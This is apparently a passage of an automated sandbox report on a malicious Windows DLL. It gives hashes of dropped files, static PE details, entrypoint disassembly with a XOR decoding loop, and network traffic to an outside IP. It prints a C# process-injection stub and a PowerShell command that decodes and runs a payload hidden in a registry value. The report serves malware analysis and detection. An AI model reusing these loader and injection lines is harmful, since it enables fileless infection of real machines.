                                                                                                                                      SHA-512:602208E375BCD655A21B2FC471C44892E26CA5BE9208B7C8EB431E27D3AAE5079A98DFFE3884A7FF9E46B24FFFC0F696CD468F09E57008A5EB5E8C4C93410B41
                                                                                                                                      Malicious:true
                                                                                                                                      Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mme. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bxtqajkpwb,uint ytemv);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr nlosdxjodm,IntPtr mvqodpevph,uint tnvcegcf,uint dbt,uint egycoak);.. }..}.
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):369
                                                                                                                                      Entropy (8bit):5.236555817911529
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f7ozxs7+AEszIWXp+N23f76An:p37Lvkmb6KHToWZE8Tl
                                                                                                                                      MD5:9EA6B9D595456E5B23DEA4B11806F78F
                                                                                                                                      SHA1:C4487B9542B629D31FC73B8CADD37D6C4CDA53D1
                                                                                                                                      SHA-256:D85066A82597D6622DE17EEC3E20F97C87204B48220F99A7B19899C0B663A34E
                                                                                                                                      SHA-512:9D85F4C83ECA80E0BE1FB57842CB3E8FD85362ED3592850316B73F41BA7C018F0A5E7A62B08A3ACADEC7B29F2BEC2AF55C09D16F70333D6907E4EB441CBE5BA5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.0.cs"
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dll
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3584
                                                                                                                                      Entropy (8bit):2.6244385522478124
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:6AW7qMTxzJUyNjWQYwSJbYgH1ulma3Sq:SqYxAgWT44K
                                                                                                                                      MD5:9E447BB5EA9933E1D20CB71DC2AC790A
                                                                                                                                      SHA1:C1D58647C580554A60A6027018CEE3C39143C2EE
                                                                                                                                      SHA-256:BA93835763E0E4FB5CFD4E71738E1E8205ED15F550E6E72848FFC8B9D7617FF9
                                                                                                                                      SHA-512:D2461C61C6C837FE436AACC1E5A102D46DC316F96A00DA9554E3B9FF3E3F5D434427A10C6E01F8A063A841E5AF38D2458685FFB8017B413BBF8BC4FDDDF91A4B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...............'...................................... 6............ H............ P.....P ......_.........e.....p.....v..........................._.!..._...!._.&..._.......+.....4.:.....6.......H.......P..................................................<Module>.jery0dbp.dll.mme.W32.mscor
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.out
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):412
                                                                                                                                      Entropy (8bit):4.871364761010112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                      MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                      SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                      SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                      SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF69EAEE788C6BF5D7.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40233
                                                                                                                                      Entropy (8bit):0.6872617452706091
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:kBqoxKAuqR+uoCLYpl23DlDNwl23DlDNrl23DlDNs:kBqoxKAuqR+uoCLYpw35qw35Vw35W
                                                                                                                                      MD5:A8F2EDC39A71827BE0EBE0795F23702B
                                                                                                                                      SHA1:5CA5DDA74C4A1FA538C7E54A0EB745379DF3FA48
                                                                                                                                      SHA-256:E63BCE665483F60D0B6135DFA320890A758390B6D3ACF556563187FF1CA23455
                                                                                                                                      SHA-512:22EC5CE2106255FAEDD494C61001762E6ACC217E6500F474F62FB0362BFE736B9031722DF1DE4677363870322B14FED15A06892EB1CAB88CFD86AA05A8603ADF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF88E050867DE26AD2.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40153
                                                                                                                                      Entropy (8bit):0.6723538040068409
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:kBqoxKAuvScS+iEOnUVtj58MxzYJJtj58MxzYJatj58MxzYJP:kBqoxKAuqR+iEOnUVtdYJJtdYJatdYJP
                                                                                                                                      MD5:D072772A8EE6BB1D1F40D9F5810CFF5B
                                                                                                                                      SHA1:D59BFDF035410E69B594CE06D30CCA46732FA6CD
                                                                                                                                      SHA-256:3F8E3C2F24061C4B5041DE82829E4B1ECABC0338722626233D521A0CE1FA869D
                                                                                                                                      SHA-512:7C40C58BE6065EB2C39DBB0F7AB6EDF1A6079EDCA96483DB2E64702AD2CAC9AC23769DE290253614EE36BCB5771D3528D94F0AA78DF3AD1512AFB240BD221D36
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF9DD6CD76C3034B75.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12933
                                                                                                                                      Entropy (8bit):0.4099601119234265
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:c9lLh9lLh9lIn9lIn9lo5F9lob9lW8pxh2:kBqoIci8pxh2
                                                                                                                                      MD5:E5745EA6BA7E4FCBEBAC1A667C4DF152
                                                                                                                                      SHA1:BC748E222B6BE84EC4F67D6E787E50FBAAFA5E84
                                                                                                                                      SHA-256:F9BBCDB0B367EBB17FF40AFBDD2B55D72775108F9B6E38181AD312A88991CF5D
                                                                                                                                      SHA-512:F4FA6F5A6659E38761731163C2917BF3B1F06D121EE5E324678C11C8D023DB0FD1DE62932858C3C091BF801A550C28BFB410EDA70769BBD3BFE6663E9D022C8F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF9E03A6049D0A4DEF.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13269
                                                                                                                                      Entropy (8bit):0.6229294369515466
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:c9lLh9lLh9lIn9lIn9lo6F9loW9lWuAWPLmqptFeifFj:kBqoIBHuAMKqptFeifFj
                                                                                                                                      MD5:A36E3BD3176E8121DAF8BB5140F5CD5B
                                                                                                                                      SHA1:D9C2E1221385DFF800CF7AC01C92B6035A39C0A8
                                                                                                                                      SHA-256:5A5217CFCB402B08114E5626D8907C6E824B70AF52052D039DA21FEC0E7F88F7
                                                                                                                                      SHA-512:DBB2AED59AF662AE1B7806F0C42F3ECC1AA7CC34488C405E957FD4516D9BCF24EECBA097A60EDF93FF6D72AB46AF9E969E92797E1D9BBCEA7A1B678064022E6A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFAC17D42899691A13.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40097
                                                                                                                                      Entropy (8bit):0.6605854536521297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:kBqoxKAuvScS+iEOnURYf9isbM8Yf9isbMTYf9isbM8:kBqoxKAuqR+iEOnURYfNbdYfNbiYfNbP
                                                                                                                                      MD5:AC5213F1863C119F6DC3196DBCE0DCA1
                                                                                                                                      SHA1:2D2271EFA95BB84F2D563E7FEBFC833838DA7B5A
                                                                                                                                      SHA-256:781CE28AABCE64773A6A515B04402D7C45EF6F4848CC9609F05B630728654E0E
                                                                                                                                      SHA-512:A90B9854AD45A914A59A186F9E5F14C83564AA1D97BB293F4BE3112FD7632DD8BC9158F578775FFCEC5F1A7C603DB83AFD1BCACF720D81B2BA4DB67315E136D9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFCE3757A75A0E50D1.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40081
                                                                                                                                      Entropy (8bit):0.6597380718430703
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:kBqoxKAuvScS+j9PGN4quk6qioquk6qiXquk6qiQ:kBqoxKAuqR+j9PGN4qSq9qSqqqSqH
                                                                                                                                      MD5:04821721DBA30A21E2778D6D8165C437
                                                                                                                                      SHA1:F18DE01A4E972ABB977A9108572EBB8BBE6E6BBB
                                                                                                                                      SHA-256:5AC06ED84B93E8CA9B61369AC493D891C7CA33133B6672B2C3892E8259E5E9C8
                                                                                                                                      SHA-512:72760C16AFBF3393CBA3D2AAB46CE3D8A2DB2A060B4F5AA5013F2D4AFFED53AA150C36E681B934D0E49AEA123DA61538871D997E3F23872C3C190740042BE00C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\Documents\20201124\PowerShell_transcript.065367.Gk+Yclh6.20201124212019.txt
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1189
                                                                                                                                      Entropy (8bit):5.31795925551072
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:BxSAnLxvBn9zx2DOXUWOLCHGIYBtLWfHjeTKKjX4CIym1ZJX/JPOLCHGIYBtcane:BZFvhJoORF/fqDYB1ZDpFyZZa
                                                                                                                                      MD5:5C19B735B25E4683C49EC53AF83C7ACA
                                                                                                                                      SHA1:05EF721AC886A6BDC1F239F8D80C419B5F09ECAC
                                                                                                                                      SHA-256:172C5E835C804347540CC631E478CF6F6BD8F9A5050332C68D897F73D9A00DA1
                                                                                                                                      SHA-512:429A69B611E2933CF12DC93468E6BDEA393AB75C6B6B9BA40213BEF539BE25E45233462A76F33804161691939E19E046FFB116208D1502EE6801395D5AC9913E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20201124212019..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 065367 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 5556..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201124212019..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..**********************..

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.655383585962167
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                      • VXD Driver (31/22) 0.00%
                                                                                                                                      File name:onerous.tar.dll
                                                                                                                                      File size:48128
                                                                                                                                      MD5:79d81979dbbd1c8ceb04cc80a903ecd1
                                                                                                                                      SHA1:f40959018e132fb1430f77a26903af222244676c
                                                                                                                                      SHA256:5dd2f21b81330a342fe1bb9a17a8fde423928e266d4842887f8b41e5d7c2fbd6
                                                                                                                                      SHA512:aeede9ecc3cbfef29ad5a1d3d4b66c245ec48e5c7407f81c7997049ce64009d80f7a97b17b8540ac247211478473ed5f1716e555e91eb64bdc94f632e90d15ec
                                                                                                                                      SSDEEP:768:/JZ7EqWjTpGrg7iSh8NHj4DqVSoqngTeHzD5CHDFuGUJtB:xZ7Eq+T087E4DqVZqngOww7t
                                                                                                                                      File Content Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L....o._...........!...I..................... ....@.................................j.....@................................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                                                                      Static PE Info

                                                                                                                                      General

                                                                                                                                      Entrypoint:0x401000
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE
                                                                                                                                      Time Stamp:0x5FB76FB9 [Fri Nov 20 07:26:49 2020 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:1
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:1
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:1
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:67fdc237b514ec9fab9c4500917eb60f

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                      jne 00007F5E4CAC4271h
                                                                                                                                      call 00007F5E4CAC428Fh
                                                                                                                                      leave
                                                                                                                                      jmp eax
                                                                                                                                      mov eax, 00000001h
                                                                                                                                      jmp 00007F5E4CAC427Eh
                                                                                                                                      cmp dword ptr [ebp+0Ch], 02h
                                                                                                                                      jne 00007F5E4CAC4266h
                                                                                                                                      xor eax, eax
                                                                                                                                      jmp 00007F5E4CAC4274h
                                                                                                                                      cmp dword ptr [ebp+0Ch], 03h
                                                                                                                                      jne 00007F5E4CAC4266h
                                                                                                                                      xor eax, eax
                                                                                                                                      jmp 00007F5E4CAC426Ah
                                                                                                                                      cmp dword ptr [ebp+0Ch], 00000000h
                                                                                                                                      jne 00007F5E4CAC4264h
                                                                                                                                      xor eax, eax
                                                                                                                                      leave
                                                                                                                                      retn 000Ch
                                                                                                                                      push ebx
                                                                                                                                      push edi
                                                                                                                                      push esi
                                                                                                                                      mov ebx, C7618E88h
                                                                                                                                      call 00007F5E4CAC4271h
                                                                                                                                      add ebx, 04h
                                                                                                                                      call 00007F5E4CAC4277h
                                                                                                                                      pop esi
                                                                                                                                      pop edi
                                                                                                                                      pop ebx
                                                                                                                                      ret
                                                                                                                                      xor eax, eax
                                                                                                                                      dec eax
                                                                                                                                      sub ebx, eax
                                                                                                                                      cmp ebx, 07618E84h
                                                                                                                                      jne 00007F5E4CAC4255h
                                                                                                                                      ret
                                                                                                                                      push 00000040h
                                                                                                                                      push 00003000h
                                                                                                                                      push 0000B440h
                                                                                                                                      push 00000000h
                                                                                                                                      call dword ptr [0040D480h]
                                                                                                                                      push ebx
                                                                                                                                      push 0000B440h
                                                                                                                                      push 00402000h
                                                                                                                                      push eax
                                                                                                                                      call 00007F5E4CAC4266h
                                                                                                                                      ret
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      pushad
                                                                                                                                      mov edi, dword ptr [ebp+08h]
                                                                                                                                      mov esi, dword ptr [ebp+0Ch]
                                                                                                                                      mov ecx, dword ptr [ebp+10h]
                                                                                                                                      mov edx, dword ptr [ebp+14h]
                                                                                                                                      lodsb
                                                                                                                                      xor al, dl
                                                                                                                                      stosb
                                                                                                                                      ror edx, 08h
                                                                                                                                      loop 00007F5E4CAC4259h
                                                                                                                                      popad
                                                                                                                                      leave
                                                                                                                                      retn 0010h
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xd4400x58.data
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000xa30x200False0.318359375data2.32927408159IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0x20000xb4980xb600False0.879035027473data7.7142875486IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0xe0000xc0x200False0.048828125data0.118369631259IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      KERNEL32.DLLVirtualAlloc

                                                                                                                                      Network Behavior

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 24, 2020 21:19:17.779686928 CET4973280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:17.779814959 CET4973380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:18.051623106 CET804973247.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:18.051764011 CET4973280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:18.053018093 CET4973280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:18.056646109 CET804973347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:18.056849003 CET4973380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:18.368787050 CET804973247.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:19.034208059 CET804973247.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:19.041465998 CET4973280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:19.043437004 CET4973280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:19.316349983 CET804973247.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:20.001231909 CET4973380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:01.623794079 CET4975080192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:01.624310017 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:01.880029917 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:01.880950928 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:01.881902933 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:01.885428905 CET804975047.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:01.885560989 CET4975080192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.179645061 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933356047 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933444023 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933485985 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933535099 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933547020 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933577061 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933578968 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933584929 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933589935 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933614016 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933650970 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933689117 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.972738981 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.972799063 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.972841024 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.972848892 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.972877979 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.972877979 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.972883940 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.972922087 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189378977 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189466000 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189506054 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189546108 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189591885 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189603090 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189634085 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189640999 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189646006 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189671040 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189696074 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189708948 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189733028 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189745903 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189752102 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189783096 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189805984 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189821005 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189831972 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189858913 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189878941 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189924955 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.228682041 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228734016 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228764057 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228801012 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228838921 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228854895 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.228878021 CET804975147.241.19.44192.168.2.3
